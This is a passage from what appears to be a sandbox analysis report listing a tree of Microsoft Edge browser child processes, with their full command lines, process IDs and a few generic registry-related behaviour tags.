C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5864,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=5952 /prefetch:84⤵PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6196,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:84⤵PID:3604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6264,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:84⤵PID:4584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6556,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=6572 /prefetch:14⤵PID:3064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6592,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:14⤵PID:980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=3532,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=5800 /prefetch:14⤵PID:5160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=6460,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=6476 /prefetch:14⤵PID:4232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=5952,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=6040 /prefetch:14⤵PID:2936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=5988,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=5052 /prefetch:14⤵PID:1888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=6736,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:14⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=6816,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=7088 /prefetch:14⤵PID:2104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=7020,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=6792 /prefetch:14⤵PID:2032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7120,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=6864 /prefetch:14⤵PID:5768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=6280,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:14⤵PID:2876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=7420,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=7364 /prefetch:14⤵PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7356,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=7528 /prefetch:84⤵PID:4312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7312,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=7560 /prefetch:84⤵PID:3716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7572,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=7604 /prefetch:84⤵PID:2528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=3596,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:14⤵PID:5376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=7304,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=7228 /prefetch:14⤵PID:1796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=7248,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=7136 /prefetch:14⤵PID:420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=6740,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:14⤵PID:3240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7280,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=7588 /prefetch:14⤵PID:5172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7856,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=7876 /prefetch:14⤵PID:4624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=7828,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:14⤵PID:2496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=7688,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=3328 /prefetch:14⤵PID:1924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=8060,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=7892 /prefetch:14⤵PID:5768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=7996,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=8376 /prefetch:14⤵PID:384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=7992,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=8100 /prefetch:14⤵PID:4640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=8340,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=8392 /prefetch:14⤵PID:5628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window4⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4536 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x288,0x7ffc8f16f208,0x7ffc8f16f214,0x7ffc8f16f2205⤵PID:4548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1728,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=2324 /prefetch:35⤵PID:544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2292,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:25⤵PID:2344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2564,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=2752 /prefetch:85⤵PID:1272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4188,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:85⤵PID:3824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4472,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=4464 /prefetch:85⤵PID:4896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4188,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:85⤵PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4912,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=4972 /prefetch:15⤵PID:4716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4920,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=4980 /prefetch:15⤵PID:5808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5552,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:85⤵PID:3272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5568,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=5640 /prefetch:85⤵PID:3736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=4488,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:15⤵PID:3084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5164,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:15⤵PID:4120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6280,i,10890786600875830017,7235457821717063099,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:15⤵PID:4436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window5⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3764 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x290,0x7ffc8f16f208,0x7ffc8f16f214,0x7ffc8f16f2206⤵PID:4492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:36⤵PID:5156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2240,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:26⤵PID:2452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2568,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:86⤵PID:2032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4196,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=4376 /prefetch:86⤵PID:4128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4368,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:86⤵PID:5580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4368,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:86⤵PID:5420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4428,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=4944 /prefetch:16⤵PID:5968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4932,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=4948 /prefetch:16⤵PID:5408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:86⤵PID:1832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5412,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:86⤵PID:3304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5796,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=5896 /prefetch:16⤵PID:1852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5788,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=5140 /prefetch:16⤵PID:4796
-
-
